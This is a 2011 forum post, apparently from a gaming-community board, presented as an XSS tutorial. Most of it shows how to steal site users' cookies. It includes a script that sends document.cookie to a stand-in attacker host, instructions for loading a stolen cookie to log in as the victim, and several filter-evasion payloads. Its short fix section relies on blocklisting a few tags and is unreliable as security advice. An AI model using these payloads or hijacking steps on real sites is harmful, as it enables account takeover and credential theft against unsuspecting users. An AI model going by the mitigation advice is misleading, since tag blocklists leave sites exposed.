Post: XSS - Cross Site Scripting - The Complete Tutorial
Options
12-18-2011, 09:37 PM
#1
tokzikate
Gym leader
Cross site scripting - XSS - is a type of website vulnerability, found in web applications. This vulnerability can be exploited by attackers, by injection malicious client-side code, like a JavaScript program, into a victims web browser, by sending them a URL for example. Using the malicious code, the attacker, can steal the victims credentials, like cookies. XSS vulnerabilities can potentially used, to perform serious, large-scale attacks. XSS attacks are very popular, and vulnerabilities have been found in even the biggest websites, including Google, FBI, AOL and Microsoft. This TuT covers finding XSS vulns, exploiting them, patching them, and then bypassing some of the patching!
Finding Basic XSS Vulnerabilities
- Search Engines
- Login Forms
- Comment Fields
How to find out if a website is vulnerable to XSS:
There are a few ways to find out if a website is vulnerable to XSS:
If you find a Search box on a website: type in:
<h1>XSSed</h1>
and you get a result like:
[ATTACH=CONFIG]14230[/ATTACH]then the website is vulnerable.
The next step, is to try to inject javascript into the search field, try typing in:
<script>alert("hi")</script>
if an alert box pops up, with "hi" in it, then the site is vulnerable to JavaScript injection.
Let's say that a hacker wanted to steal cookies from the site, he could craft a link using the Search function, to first see if the site saved cookies:
[SIZE=3]<a href=javascript:alert(document.cookie);>Click me</a>[/SIZE]
This code would get a result like so: [ATTACH=CONFIG]14236[/ATTACH]
The hacker could then make his own PHP page, that saves the cookie, with a code like this:
[SIZE=3]<script> document.location = 'https://hackerssiteexample.com/save.cgi?cookie=' + document.cookie; </script>[/SIZE]
This code would redirect the user, to the site shown, and (with the right code on the site), the hacker can save the cookie!!
Applying the Vulnerabilities
Once you have stolen the cookie, you're probably thinking, "What the **** does this even do?"
Well: 1) You need firefox.
2) You need to get the firebug add-on, link: https://addons.mozilla.org/en-US/firefox/addon/firebug/
3) and finally you need the FireCookie addon, link: https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Once you have all that, then you navigate to the website, you stole a cookie/s from.
You press F12 to open Firebug, or just go "Tools>Web Developer>FireBug>Open Firebug Click on the "Cookies" Tab: [ATTACH=CONFIG]14237[/ATTACH]
You then find the website you stole the cookie from, edit the cookie, remove the data that's there, paste in the stolen cookie. Navigate to the website and you're logged in with the users account, who you stole the cookie from! :fyea:
Patching/Filtering the XSS vulnerability
If you have your own website, and find that it's vulnerable to XSS, you're like :FU: >
But you can patch it!
You can eradicate the vulnerability, by filtering out tags from the input.
Tags that NEED to be filtered include:
<script></script> <a href=""></a> there are more though!
Evading Simple Filtering
You can use other XSS techniques, to evade simple filtering, I will list a few here:
[SIZE=3][SIZE=2]<IMG SRC=javascript:alert('XSS'
> //only works with IE & Opera[/SIZE] [/SIZE]<IMG """><SC
T>alert("XSS")</SCT>"><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')>
You can find many others at: https://ha.ckers.org/xss.html
Some Useful Resources: https://www.steve.org.uk/Security/XSS/Tutorial/
You must login or register to view this content. //Intro to Hacking in general!
Enjoy! =D
Please leave feedback, Thankyou!
edit: I tried to add pages, but Failed miserably :/
you're going to have to put up with spoilers for now
The following 3 users say thank you to tokzikate for this useful post:
12-24-2011, 02:06 AM
#3
Lucid Ghost
||BOSS||
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
